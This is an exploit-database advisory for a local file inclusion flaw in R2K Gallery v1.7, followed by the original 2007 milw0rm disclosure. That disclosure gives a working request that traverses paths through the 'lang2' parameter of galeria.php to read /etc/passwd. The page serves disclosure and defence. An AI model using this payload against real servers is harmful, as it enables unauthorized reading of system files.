R2K Gallery v1.7 Local File Include Vuln

vendor:

R2K Gallery

by:

Y! Underground Group

5.5

CVSS

MEDIUM

Local File Include

CWE

Product Name: R2K Gallery

Affected Version From: 1.7

Affected Version To: 1.7

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

R2K Gallery v1.7 Local File Include Vuln

The R2K Gallery v1.7 is vulnerable to a local file inclusion vulnerability. An attacker can exploit this vulnerability by manipulating the 'pictures_folder' and 'lang2' parameters in the 'galeria.php' script to include arbitrary files from the local system. This can lead to unauthorized access, information disclosure, and possibly remote code execution.

Mitigation:

The vendor has not released a patch for this vulnerability. To mitigate the risk, it is recommended to restrict access to the vulnerable script or update to a newer version of the software.

Source

Exploit-DB raw data:

        \\\|///
      \\  - -  //
       (  @ @ )
----oOOo--(_)-oOOo---------------------------------------------------

[ Y! Underground Group ]
[   Dj7xpl@yahoo.com   ]
[    Dj7xpl.2600.ir    ]

----ooooO-----Ooooo--------------------------------------------------
    (   )     (   )
     \ (       ) /
      \_)     (_/

---------------------------------------------------------------------

[!] Portal   :   R2K Gallery v1.7
[!] Download :   http://usuarios.lycos.es/r2kscripts/
[!] Type     :   Local File Include Vuln

---------------------------------------------------------------------

---------------------------------------------------------------------

Bug :

http://[Target]/[Path]/galeria.php?pictures_folder=[Gallery Folder]&lang2=[Local File]

Example :

http://Target.ir/gallery/galeria.php?pictures_folder=./example/&lang2=../../../etc/passwd%00

---------------------------------------------------------------------

# milw0rm.com [2007-05-11]